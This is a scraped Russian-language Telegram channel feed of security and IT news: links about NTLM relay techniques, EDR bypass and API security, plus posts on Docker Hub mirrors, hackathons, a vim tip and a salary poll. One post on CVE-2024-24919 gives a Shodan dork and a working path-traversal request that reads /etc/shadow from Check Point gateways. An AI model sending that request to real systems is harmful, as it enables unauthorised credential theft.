🥷 Изучение необычных методов атаки на NTLM relay
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay
2️⃣ Relaying to Microsoft SQL Server
3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation
4️⃣ Shadow Credentials Attack with no Prior Credentials
5️⃣ Shadow Credentials Attack Using Prior Credentials
#pentest #redteam
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GuidePoint Security
Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques
Threat & Attack Simulation Technical Lead Kevin Murphy details 5 lesser-known NTLM relay attacks that have to help you penetration test your networks.
🔥2
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
🥱7❤2👍1😁1😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Библиотека программиста | программирование, кодинг, разработка
💻⌛ 8 причин участвовать в хакатонах
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
❤2👍2🔥1
Исследователь из PortSwigger рассматривает новую технику эксплуатации, которую можно использовать для полной компрометации веб-приложения с помощью TRACE — древнего метода HTTP, который поддерживается более широко, чем вы думаете.
👉 Читать
#bugbounty #pentest #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
This media is not supported in your browser
VIEW IN TELEGRAM
#vim позволяет использовать любой разделитель регулярных выражений при замене шаблона.
Нет необходимости использовать
Это позволяет избежать экранирования символа
#tips
Нет необходимости использовать
/, попробуйте вместо этого #:
:s#/usr/local/bin#/usr/sbin#g
Это позволяет избежать экранирования символа
/.#tips
🔥5👍4
Вы узнаете, как:
☑️ Традиционные приложения полагались на отдельные файлы, получаемые с помощью HTTP-запросов, в то время как современные объединяют код в пакеты и используют API для создания динамического контента.
☑️ Мобильные приложения, IoT и веб-приложения взаимодействуют через API.
Кроме того, вы получите представление о 10 основных рисках безопасности API OWASP + ценные ресурсы для безопасной разработки API.
#pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥱1
Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇
👀 Смотреть
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Устраивает ли вас ваша зарплата?
Anonymous Poll
11%
Более чем
40%
Нет, не устраивает
19%
— Вот возьми, твоя зарплата. — Это же ветка?!
1%
Свой вариант (напишу в комментариях)
29%
Посмотреть результаты
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🌚1
Из нового выпуска вы узнаете об интересном мире уязвимостей и пути Антона в ИБ-индустрии. Bo0oM — КМС по вольной борьбе с уязвимостями и владелец черного пояса в мастерстве кидания кавычек.
⏱️ Таймкоды:
01:54 Антон или Дима?
04:32 С чего начинался интерес к секьюрити
06:26 Первый взлом на игре resident evil
08:36 Хотел ли стать реверсером или хардварщиком?
10:55 Спуфинг вайфая на секьюрити конференции для исследования
12:56 Как попал в Onsec и знакомство с Иваном
19:05 Откуда шло развитие и мотивация
22:30 Багхантинг и не материальные бенифиты
28:49 Материальные бенифиты и максимальные выплаты на багхантинге
33:35 Обратная сторона исследований и угрозы
35:30 История с МТС и шуточным сообщением на забытом поддомене
40:35 Подход для выбора цели исследования
42:10 Взлом платформы для разблокировки украденных устройств
49:55 Перво место на хакатоне и премия мэра на 1 миллион рублей
1:00:33 «Стартапы» Антона и сложности предпринимательства
1:11:30 Судьба Взрывного блога
1:16:13 Как сохранять мотивацию и интерес к работе за такой большой промежуток времени
1:18:51 Повлияла ли работа на личную жизнь
1:21:08 Влияние AI на индустрию
1:23:58 Способ оставаться в трендах и оставаться в курсе тенденций и угроз индустрии
#podcasts
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2🔥1🥰1
Практические ресурсы для исследования безопасности CI/CD:
🧠 Техники
🛠️ Инструменты нападения
🗒️ Тематические исследования
👉 GitHub
#tips #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
💬 Что не так с этим кодом? Каким багам он подвержен? Свои ответы пишите в комментарии👇
#вопросы_для_самопроверки
#вопросы_для_самопроверки
👍2
Подписывайтесь на наш новый канал про нейросети для создания изображений, там есть:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2
Forwarded from Proglib.academy | IT-курсы
💵 ТОП-15 самых востребованных профессий в ИТ: куда все катится в 2024 году
Мы часто обсуждаем зарплаты айтишников в России. Однако не стоит забывать про США, ведь это страна — мечта для многих программистов. В этой статье расскажем, сколько зарабатывают айтишники в США.
Вкатываться в айти в 2024 году однозначно стоит. Только в США базовые зарплаты всех ИТ-специалистов в США выросли на 2,6%, — спрос на квалифицированных ИТ-специалистов остаётся высоким.
🔗 Читать статью
🔗 Зеркало
Мы часто обсуждаем зарплаты айтишников в России. Однако не стоит забывать про США, ведь это страна — мечта для многих программистов. В этой статье расскажем, сколько зарабатывают айтишники в США.
Вкатываться в айти в 2024 году однозначно стоит. Только в США базовые зарплаты всех ИТ-специалистов в США выросли на 2,6%, — спрос на квалифицированных ИТ-специалистов остаётся высоким.
🔗 Читать статью
🔗 Зеркало
❤1
EDR на macOS и Linux? Никто не думает об этом в ходе редтима или пентеста. Но данное средство защиты можно встретить не только на Windows.
Приведенный ресёрч рассказывает об обходе EDR в macOS/Linux и освещает возможности/недостатки EDR.
👉 Читать
#pentest #redteam #research
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Мы наконец-то запустили канал по разработке игр — теперь все самое важное и полезное из мира геймдева можно узнать в одном месте.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1